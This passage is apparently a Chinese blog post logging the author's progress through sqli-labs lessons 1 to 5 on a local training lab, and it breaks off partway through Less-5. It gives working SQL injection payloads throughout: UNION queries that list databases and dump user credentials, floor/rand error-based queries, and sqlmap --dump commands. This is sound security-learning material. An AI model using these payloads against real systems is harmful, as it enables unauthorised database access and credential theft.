<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">


  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "112bf565"
    });
  daovoice('update');
  </script>






  
  
  <link rel="stylesheet" media="all" href="/lib/Han/dist/han.min.css?v=3.3">




<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">


  <link rel="manifest" href="/images/manifest.json">




  <meta name="keywords" content="sqli-labs,SQL注入,">





  <link rel="alternate" href="/atom.xml" title="煊奕" type="application/atom+xml">






<meta name="description" content="前言:此文用于记录学习SQL注入过程中的所得所思，因为可以说是菜鸟了，需要参考大佬的解题方法，所以一切慢慢来吧，希望越来越强。 做题过程中的各种知识 在mysql数据库中，单行注释有#和--，在实际操作中#号一般用%23来表示。而–则用--+来表示。因为在URL中，如果在最后加上– ，浏览器在发送请求的时候会把URL末尾的空格舍去，而用--+代替– ，原因是+在URL被URL编码后会变成空格。。">
<meta name="keywords" content="sqli-labs,SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-Labs-Less1-10">
<meta property="og:url" content="https://clwsec.top/2019/03/07/sqli-labs-Less1-10/index.html">
<meta property="og:site_name" content="煊奕">
<meta property="og:description" content="前言:此文用于记录学习SQL注入过程中的所得所思，因为可以说是菜鸟了，需要参考大佬的解题方法，所以一切慢慢来吧，希望越来越强。 做题过程中的各种知识 在mysql数据库中，单行注释有#和--，在实际操作中#号一般用%23来表示。而–则用--+来表示。因为在URL中，如果在最后加上– ，浏览器在发送请求的时候会把URL末尾的空格舍去，而用--+代替– ，原因是+在URL被URL编码后会变成空格。。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-2db67ae6d21baec9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f559f4522e2b44f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-db722f241ee66e01.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-3073b180ec7b1d32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-1b6b5b8d6d4e168e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-155a64f13f89be56.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-06bf6e3b1f36475d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-6ed4dac270296b9b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-97b6ae3f4305aa16.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-9c80b38800e7476d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-2e9c591096e2c662.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-c2d1bbaef809b6d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-e2a457c177037882.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-4333f4a9c157b299.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-4b5cec38773dd5dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-d8469108dce28040.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-d00559d07567add2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8b392c1e773e35c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-20370cc17e1bf427.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-d7b1e2554228adfb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-c227df25f227ae17.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8fa4954f1329a495.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-6b2de4087bcb5c72.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-059fc00778f43bf8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-460c01c27eb98790.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-4ea25bf838a64d21.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-6aeb02565c36cd2a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-59bee5851f4dbcd8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-aff665d270bc3f80.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8cad0ada3774ffcd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-e9c8a90dfa7ca42c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-d5f430ac92482178.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-b9d825cb3ab27ceb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f27b2c187e38b116.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8cad0ada3774ffcd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-94c03d58f0da40b6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-7197704c33c3bb43.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8f09352e40d5b077.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-31736b8a5e25386d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-5439bda9c9db9fa5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-12853a07376ae79d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-583a594a844be6a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-54d1a6a6fc790c81.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-57260168646d97f2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-4accd17dfa12b9d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-4068fff492bb2df0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-1830cfc0a1edeceb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8ec7278bdd9ec84b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-03-17T10:26:01.144Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Sqli-Labs-Less1-10">
<meta name="twitter:description" content="前言:此文用于记录学习SQL注入过程中的所得所思，因为可以说是菜鸟了，需要参考大佬的解题方法，所以一切慢慢来吧，希望越来越强。 做题过程中的各种知识 在mysql数据库中，单行注释有#和--，在实际操作中#号一般用%23来表示。而–则用--+来表示。因为在URL中，如果在最后加上– ，浏览器在发送请求的时候会把URL末尾的空格舍去，而用--+代替– ，原因是+在URL被URL编码后会变成空格。。">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/9216631-2db67ae6d21baec9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":10,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://clwsec.top/2019/03/07/sqli-labs-Less1-10/">





  <title>Sqli-Labs-Less1-10 | 煊奕</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">煊奕</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">No pains No gains</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-链接">
          <a href="/links/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            链接
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://clwsec.top/2019/03/07/sqli-labs-Less1-10/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lei">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="煊奕">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Sqli-Labs-Less1-10</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-07T18:49:15+08:00">
                2019-03-07
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2019-03-17T18:26:01+08:00">
                2019-03-17
              </time>
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQL/" itemprop="url" rel="index">
                    <span itemprop="name">SQL</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/03/07/sqli-labs-Less1-10/" class="leancloud_visitors" data-flag-title="Sqli-Labs-Less1-10">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
          
            <div class="post-wordcount">
              
                
                  <span class="post-meta-divider">|</span>
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.7k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body han-init-context" itemprop="articleBody">

      
      

      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言:"></a>前言:</h3><p>此文用于记录学习SQL注入过程中的所得所思，因为可以说是菜鸟了，需要参考大佬的解题方法，所以一切慢慢来吧，希望越来越强。</p>
<h3 id="做题过程中的各种知识"><a href="#做题过程中的各种知识" class="headerlink" title="做题过程中的各种知识"></a>做题过程中的各种知识</h3><ol>
<li>在mysql数据库中，单行注释有<code>#</code>和<code>--</code>，在实际操作中#号一般用<code>%23</code>来表示。而–则用<code>--+</code>来表示。因为在URL中，如果在最后加上– ，浏览器在发送请求的时候会把URL末尾的空格舍去，而用<code>--+</code>代替– ，原因是+在URL被URL编码后会变成空格。。</li>
<li>与数据库相关的内容：</li>
</ol>
<ul>
<li>information_schema，系统数据库，包含所有数据库相关信息。</li>
<li>information_schema.schemata中schema_name列，字段为所有数据库名称。</li>
<li>information_schema.tables中table_name列对应数据库所有表名，其中table_schema列是所有数据库名。</li>
<li>information_schema.columns中，column_name列对应所有列名，其中table_schema列也对应所有数据库名，table_name列也对应所有表名。</li>
</ul>
<ol start="3">
<li>联合查询时需要将前面的查询结果限定为空集，后面的查询结果才能显示出来。</li>
<li><a href="https://baijiahao.baidu.com/s?id=1595349117525189591&amp;wfr=spider&amp;for=pc" target="_blank" rel="noopener">concat(),concat_ws()与及group_concat()的用法</a></li>
<li>其他相关知识点在文末附有相应链接，就不在这赘述了。</li>
</ol>
<h3 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h3><h4 id="手工UNION联合查询注入"><a href="#手工UNION联合查询注入" class="headerlink" title="手工UNION联合查询注入"></a>手工UNION联合查询注入</h4><ol>
<li>根据题目提示，输入<code>http://localhost:8088/sqlilabs/Less-1/?id=1</code>显示正常。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-2db67ae6d21baec9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>加个单引号看看，<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39;</code>显示语句出错。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-f559f4522e2b44f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>通过<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39; %23</code>或<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39;--+</code>或<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39; and &#39;1&#39;=&#39;1</code> 可知，是单引号字符型注入。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-db722f241ee66e01.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>下面开始构造语句，首先先了解相关的数据库内容：</li>
</ol>
<ul>
<li>information_schema，系统数据库，包含所有数据库相关信息。</li>
<li>information_schema.schemata中schema_name列，字段为所有数据库名称。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-3073b180ec7b1d32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SCHEMATA"></li>
<li>information_schema.tables中table_name列对应数据库所有表名，其中table_schema列是所有数据库名。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-1b6b5b8d6d4e168e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="TABLES"></li>
<li>information_schema.columns中，column_name列对应所有列名，其中table_schema列也对应所有数据库名，table_name列也对应所有表名。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-155a64f13f89be56.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="COLUMNS"></li>
</ul>
<ol start="5">
<li>使用order by查列数，order by语法为：ORDER BY column1 [ASC|DESC], column2 [ASC|DESC],… 此处以数字1,2,3…指定以某一列为key进行排序，通过尝试得出列数,得出列数为3。</li>
</ol>
<ul>
<li>order by 3时，<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39; order by 3 --+</code>，正常：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-06bf6e3b1f36475d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>order by 4时，<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39; order by 4 --+</code>，出错：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-6ed4dac270296b9b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ul>
<ol start="6">
<li>接着进行联合注入，通过回显爆出表名，列名，字段，用户名和密码。</li>
<li>爆数据库名:<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(schema_name),3 from information_schema.schemata --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-97b6ae3f4305aa16.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>爆当前security数据库的表:<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;security&#39;--+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-9c80b38800e7476d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>爆user表的列:<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#39;users&#39; --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-2e9c591096e2c662.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>爆所有用户名和密码: <code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(concat_ws(&#39;:&#39;,username,password)),3 from users --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-c2d1bbaef809b6d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<ul>
<li>或这样构造: <code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(username),group_concat(password) from users --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-e2a457c177037882.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><h4 id="使用sqlmap工具进行注入"><a href="#使用sqlmap工具进行注入" class="headerlink" title="使用sqlmap工具进行注入"></a>使用sqlmap工具进行注入</h4></li>
</ul>
<ol>
<li>各个参数就不一一说明了，请参考这篇文章:<a href="https://www.cnblogs.com/ichunqiu/p/5805108.html" target="_blank" rel="noopener">11种常见SQLMAP使用方法详解</a></li>
<li>首先，直接指定相关参数，如注入类型，数据库类型等:<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql --batch</code> 得到相关信息。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-4333f4a9c157b299.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li><p>开始注入，爆出数据库名：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql --batch --dbs</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-4b5cec38773dd5dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
</li>
<li><p>爆出<code>security</code>中所有表名: <code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-d8469108dce28040.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
</li>
<li><p>爆出<code>users</code>表中的所有字段：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-d00559d07567add2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
</li>
<li>爆出用户信息：<code>python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-8b392c1e773e35c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<hr>
<h3 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h3><ol>
<li>首先<code>http://localhost:8088/sqlilabs/Less-2/?id=1</code>,正常。</li>
<li>加单引号<code>http://localhost:8088/sqlilabs/Less-2/?id=1&#39;</code>出错提示为：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-20370cc17e1bf427.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br>可知单引号影响了闭合，为数字型注入。</li>
<li>也就是不添加单引号，也不需要注释了，直接在后面添加语句，进行联合查询，构造的语句均和Less-1一样。</li>
</ol>
<hr>
<h3 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h3><ol>
<li>加单引号<code>http://localhost:8088/sqlilabs/Less-3/?id=1&#39;</code>出错：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-d7b1e2554228adfb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>由错误提示可知后台查询语句应为<code>select * from * where id = (&#39;$id&#39;) LIMIT 0,1</code></li>
<li>构造<code>http://localhost:8088/sqlilabs/Less-3/?id=1&#39;) --+</code> 进行测试。访问正常，猜测正确。</li>
<li>接下来的语句构造同上。</li>
</ol>
<hr>
<h3 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h3><ol>
<li>加单引号<code>http://localhost:8088/sqlilabs/Less-4/?id=1&#39;</code>，正常。</li>
<li>考虑到语句中可能为双引号，加双引号试试<code>http://localhost:8088/sqlilabs/Less-4/?id=1&quot;</code>, 报错：<code>use near &#39;&quot;1&quot;&quot;) LIMIT 0,1&#39; at line</code>, 可知查询语句应该为<code>select * from * where id = (&quot;$id&quot;) LIMIT 0,1</code></li>
<li>如上，构造语句为<code>http://localhost:8088/sqlilabs/Less-4/?id=1&quot;) --+</code>, 访问正常，接下来的构造如上。</li>
</ol>
<hr>
<h3 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h3><ol>
<li>加单引号<code>http://localhost:8088/sqlilabs/Less-5/?id=1&#39;</code>，错误<code>use near &#39;&#39;1&#39;&#39; LIMIT 0,1&#39; at line 1</code>，知闭合为单引号。</li>
<li>输入<code>http://localhost:8088/sqlilabs/Less-5/?id=1&#39;--+</code>，显示依然如下：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-c227df25f227ae17.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
<li>页面出现SQL语句报错，在这可以使用：报错型盲注。构造原理与方法请参考这篇文章：<a href="https://blog.csdn.net/Leep0rt/article/details/78556440" target="_blank" rel="noopener">详细讲解双查询注入</a><br>还可用布尔型盲注、时间延迟型盲注等，它们都属于盲注，以后再尝试。</li>
<li>构造如下语句：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and (select 1 from (select count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-8fa4954f1329a495.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<ul>
<li>提示输出信息超过一行，说明这里数据库名组成的字符串长度超过了64位(<code>group_concat()</code>函数最大长度为64位)，所以需要放弃<code>group_concat()</code>函数，而使用<code>limit 0,1</code>来一个个输出。</li>
<li><code>limit 0,1</code>  表示输出第一个数据。   0表示输出的起始位置，1表示跨度为1（即输出几个数据，1表示输出一个，2就表示输出两个）</li>
</ul>
<ol start="5">
<li>更改语句为：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+</code> 得到第一个数据库的名字为 <code>information_schema</code><br><strong>注意：</strong> 0是拼接上去的，这个0由<code>rand()</code>函数产生，是floor报错语句中输出的一部分。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-6b2de4087bcb5c72.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<ul>
<li>为了方便查看，稍微改动语句：<code>http://localhost:8088/sqlilabs/Less-5/?id=2&#39; and (select 1 from (select count(*),concat((select concat(schema_name,&#39;;&#39;) from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)--+</code> 如下：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-059fc00778f43bf8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ul>
<ol start="6">
